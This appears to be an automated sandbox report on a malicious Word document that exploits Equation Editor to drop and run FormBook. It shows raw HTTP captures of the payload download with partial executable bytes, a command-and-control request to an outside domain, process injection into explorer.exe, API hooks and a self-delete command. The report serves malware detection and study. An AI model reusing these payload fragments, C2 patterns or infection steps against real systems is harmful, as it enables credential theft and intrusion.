Sep 27, 2021 15:20:59.983045101 CEST	2	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 13:20:59 GMT Content-Type: application/x-msdownload Content-Length: 854528 Last-Modified: Mon, 27 Sep 2021 01:40:35 GMT Connection: keep-alive ETag: "61512113-d0a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a5 12 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 70 0b 00 00 98 01 00 00 00 00 00 de 8f 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 8f 0b 00 4f 00 00 00 00 a0 0b 00 3c 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 6f 0b 00 00 20 00 00 00 70 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 3c 94 01 00 00 a0 0b 00 00 96 01 00 00 72 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0d 00 00 02 00 00 00 08 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 8f 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 1c 53 02 00 03 00 00 00 8c 02 00 06 04 20 04 00 88 6f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 2a 00 00 0a 6f 27 00 00 0a 58 20 29 55 55 a5 5a 28 2c 00 00 0a 02 7b 2b 00 00 0a 6f 2e 00 00 0a 58 2a 00 00 00 13 30 07 00 88 00 00 00 04 00 00 11 14 72 25 00 00 70 18 8d 17 00 00 01 25 16 02 7b 2a 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 25 17 02 7b 2b 00 00 0a 0c 12 02 12 03 fe 15 06 00 00 1b 09 8c 06 00 00 1b 2d 14 71 06 00 00 1b 0d 12 03 09 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0p @ `@O<@ H.texto p `.rsrc<r@@.reloc@@BHS o{#:($}#0$u,(%{#{#o&+v l )UUZ(%{#o'X0Mrp%{#-q-&+o((){{+V($}}+0<u,0(%{{o&,(,{+{+o-+* pi\| )UUZ(%{o'X )UUZ(,{+o.X0r%p%{*-q-&+o(%{+-q-&+

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	2.57.140.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 15:22:48.707828999 CEST	904	OUT	GET /ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== HTTP/1.1 Host: www.islamic-coins.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 27, 2021 15:22:48.740087032 CEST	905	IN	HTTP/1.1 302 Redirect Location: https://www.netexplorer.fr/ Accept-Ranges: bytes Date: Mon, 27 Sep 2021 13:22:48 GMT Connection: close

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEF
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEF
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEF
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEF

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 196 Parent PID: 596

General

Start time:	15:20:19
Start date:	27/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f620000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: EQNEDT32.EXE PID: 800 Parent PID: 596

General

Start time:	15:20:20
Start date:	27/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: obinnamaxdw2962.exe PID: 2612 Parent PID: 800

General

Start time:	15:20:21
Start date:	27/09/2021
Path:	C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Imagebase:	0x9e0000
File size:	854528 bytes
MD5 hash:	CEE3C4065C5CB9237B7EBE5C1B3ECEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.426552817.0000000002233000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 18%, ReversingLabs
Reputation:	low

Analysis Process: obinnamaxdw2962.exe PID: 2412 Parent PID: 2612

General

Start time:	15:20:27
Start date:	27/09/2021
Path:	C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Imagebase:	0x9e0000
File size:	854528 bytes
MD5 hash:	CEE3C4065C5CB9237B7EBE5C1B3ECEA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 1764 Parent PID: 2412

General

Start time:	15:20:28
Start date:	27/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmmon32.exe PID: 2572 Parent PID: 1764

General

Start time:	15:20:52
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0xd00000
File size:	43008 bytes
MD5 hash:	EA7BAAB0792C846DE451001FAE0FBD5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2812 Parent PID: 2572

General

Start time:	15:21:06
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe'
Imagebase:	0x4aa00000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report OBL PN210700369.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations